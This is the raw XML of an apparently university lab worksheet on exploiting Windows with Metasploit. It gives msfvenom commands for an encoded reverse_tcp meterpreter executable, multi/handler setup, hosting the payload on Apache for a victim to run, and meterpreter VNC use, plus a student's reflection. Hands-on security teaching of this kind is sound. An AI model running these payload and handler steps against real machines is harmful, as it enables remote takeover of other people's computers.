      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F137CBC" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:ind w:left="840" w:right="1894"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>msf6 exploit(multi/handler) &gt; set paylo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>ad windows/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>msf6 exploit(multi/handler) &gt; set LHOST 10.0.2.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A5173C" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:ind w:left="840" w:right="5282"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>msf6 exploit(multi/handler) &gt; set LPORT 3333</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>msf6 exploit(multi/handler) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D791197" w14:textId="7D14559F" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/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3712" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0671DFB0" wp14:editId="2A28DF89">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1167130</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>176530</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5497195" cy="701040"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="62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97195" cy="70104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BAC701" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                            <w:pPr>
                              <w:spacing w:line="274" w:lineRule="exact"/>
                              <w:ind w:left="28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Go to your Windows (Victim Machine)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1D714F1A" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
                            <w:pPr>
                              <w:pStyle w:val="BodyText"/>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="1EF454D7" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                            <w:pPr>
                              <w:ind w:left="28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Browser </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>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10.0.2.15/share</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1E677F05" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                            <w:pPr>
                              <w:ind w:left="28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Click on the Payload E</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>xe file and Install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71DFB0" id="Text Box 39" o:spid="_x0000_s1038" type="#_x0000_t202" style="position:absolute;margin-left:91.9pt;margin-top:13.9pt;width:432.85pt;height:55.2pt;z-index:-15712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" fillcolor="silver" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="49BAC701" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                      <w:pPr>
                        <w:spacing w:line="274" w:lineRule="exact"/>
                        <w:ind w:left="28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Go to your Windows (Victim Machine)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1D714F1A" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
                      <w:pPr>
                        <w:pStyle w:val="BodyText"/>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="1EF454D7" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                      <w:pPr>
                        <w:ind w:left="28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Browser </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t></w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman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10.0.2.15/share</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1E677F05" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                      <w:pPr>
                        <w:ind w:left="28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Click on the Payload E</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>xe file and Install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8A4C1EB" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43B03C26" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B00473C" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:spacing w:before="93"/>
        <w:ind w:left="840"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>meterpreter &gt; sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B9A2F0" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3148"/>
        </w:tabs>
        <w:ind w:left="1560"/>
      </w:pPr>
      <w:r>
        <w:t>Computer</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>WIN_USER-PC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AC985E" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="085E3D6C" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="92"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>meterpreter &gt; run vnc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22670199" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64B5083F" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:ind w:left="840" w:right="1926"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>VNC is Virtual Network Computing, (a GUI based desktop sharing utility). It uses Remote Frame Buffer Protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100A4589" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="751A5AC7" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1560"/>
      </w:pPr>
      <w:r>
        <w:t>Desktop name "win_user-pc"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F198579" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:sectPr w:rsidR="008B5358">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="1300" w:left="600" w:header="708" w:footer="1119" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61222C20" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7703B82A" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1266"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="599F14D7" wp14:editId="46EF54E5">
            <wp:extent cx="5715002" cy="4286250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25" name="image23.jpeg" descr="C:\Users\n.kaliyamurthy\OneDrive - University of Wales Trinity Saint David\Modules_Handling\Sep 2020\L6 - Advanced Cyber Security (ACCB6000)\Images used in PPts\screen12112020\A910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23.jpe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2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BD1CB7" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="148"/>
        <w:ind w:left="2722" w:right="2962"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>You could now see the Payload executed…..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46038341" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FCF283D" w14:textId="507DD615" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:b/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4736" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6698B865" wp14:editId="03C8FC25">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>895985</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>178435</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5768340" cy="2458720"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="61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8340" cy="245872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405F56" w14:textId="5A131CC8" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                            <w:pPr>
                              <w:spacing w:before="5"/>
                              <w:ind w:left="28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Record your reflections on exploiting client side vulnerabilities and create virtual network computing:</w:t>
                            </w:r>
                            <w:r w:rsidR="009270A5">
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2A43F91A" w14:textId="0CB82920" w:rsidR="009270A5" w:rsidRDefault="009270A5">
                            <w:pPr>
                              <w:spacing w:before="5"/>
                              <w:ind w:left="28"/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41C6EFF8" w14:textId="784A6844" w:rsidR="009270A5" w:rsidRDefault="009270A5" w:rsidP="009270A5">
                            <w:pPr>
                              <w:spacing w:before="5"/>
                              <w:ind w:left="28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After doing a couple pf labs and CTF’s using Metasploit, it is a very useful tool to gain access into windows machines. Using msfvenom to create a payload and multi/handler to get a meterpreter session is very useful to go through the files. </w:t>
                            </w:r>
                            <w:r w:rsidR="00246F7D">
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Then I created a new payload to allow me to escalate the privliages(shikata qa nai).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98B865" id="Text Box 38" o:spid="_x0000_s1039" type="#_x0000_t202" style="position:absolute;margin-left:70.55pt;margin-top:14.05pt;width:454.2pt;height:193.6pt;z-index:-157117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" fillcolor="#f2f2f2" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="78405F56" w14:textId="5A131CC8" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                      <w:pPr>
                        <w:spacing w:before="5"/>
                        <w:ind w:left="28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Record your reflections on exploiting client side vulnerabilities and create virtual network computing:</w:t>
                      </w:r>
                      <w:r w:rsidR="009270A5">
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2A43F91A" w14:textId="0CB82920" w:rsidR="009270A5" w:rsidRDefault="009270A5">
                      <w:pPr>
                        <w:spacing w:before="5"/>
                        <w:ind w:left="28"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="41C6EFF8" w14:textId="784A6844" w:rsidR="009270A5" w:rsidRDefault="009270A5" w:rsidP="009270A5">
                      <w:pPr>
                        <w:spacing w:before="5"/>
                        <w:ind w:left="28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After doing a couple pf labs and CTF’s using Metasploit, it is a very useful tool to gain access into windows machines. Using msfvenom to create a payload and multi/handler to get a meterpreter session is very useful to go through the files. </w:t>
                      </w:r>
                      <w:r w:rsidR="00246F7D">
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Then I created a new payload to allow me to escalate the privliages(shikata qa nai).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947548D" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60835506" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2961C30A" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="92"/>
        <w:ind w:left="840" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t>MSFVENOM to create Payload (shikata_ga_nai) and Escalate Privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268413C7" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33F77529" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:spacing w:before="92"/>
        <w:ind w:left="2626" w:right="3221"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Refer to your previous lab for detailed description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375684C1" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D2FB84F" w14:textId="7D321D97" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="2627" w:right="3221"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlit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6048" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0BE6E76A" wp14:editId="14899552">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>694055</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>353060</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6866255" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="60" name="Lin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662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AA7546" id="Line 37" o:spid="_x0000_s1026" style="position:absolute;z-index:1574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4.65pt,27.8pt" to="595.3pt,2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">
                <w10:wrap anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
        </w:rPr>
        <w:t>CREATE PAYLOAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABE5A28" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
        </w:rPr>
        <w:sectPr w:rsidR="008B5358">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="1300" w:left="600" w:header="708" w:footer="1119" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="739597DB" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:spacing w:before="82"/>
        <w:ind w:left="840" w:right="1825"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>root@kali:/home/kali# msfvenom -p windows/meterpreter/reverse_tcp --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.0.2.15 -f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>exe &gt; Desktop/ExploitPriv.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEF98FB" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r>
        <w:t>Final size of exe file: 73802 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECCA8BB" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C71D5B7" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="3393" w:right="1462" w:hanging="2520"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
        </w:rPr>
        <w:t>CHECK FILE/FOLDER PERMISSIONS (As we have alr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
        </w:rPr>
        <w:t>eady set them. If not executable, follow instructions in the task 2 from CHMOD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2620A7C5" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DD105AF" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66D3F199" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:spacing w:before="92"/>
        <w:ind w:left="840"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>root@kali:/home/kali# ls -la /var/www/html/ | grep share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE8716A" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r>
        <w:t>drwxr-xr-x 2 www-data www-data 4096 Nov 10 16:32 share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F53F2DB" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6298A56E" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="2649"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
        </w:rPr>
        <w:t>Start Apache and copy the exploit to the shared folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150F600E" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09E4AC91" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:spacing w:before="92"/>
        <w:ind w:left="840"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>root@kali:/home/kali# service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BCE1FD" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D3659EF" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:spacing w:before="92"/>
        <w:ind w:left="840"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>root@kali:/home/kali# cp /home/kali/Desktop/ExploitPriv.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29251A6A" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:ind w:left="840"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>/var/www/html/share/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F732043" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EA97651" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:ind w:left="2623" w:right="3221"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Set Payload and Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562CE24F" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12F2C539" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:spacing w:before="92"/>
        <w:ind w:left="840" w:right="6561"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>root@kali:/home/kali# msfconsole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
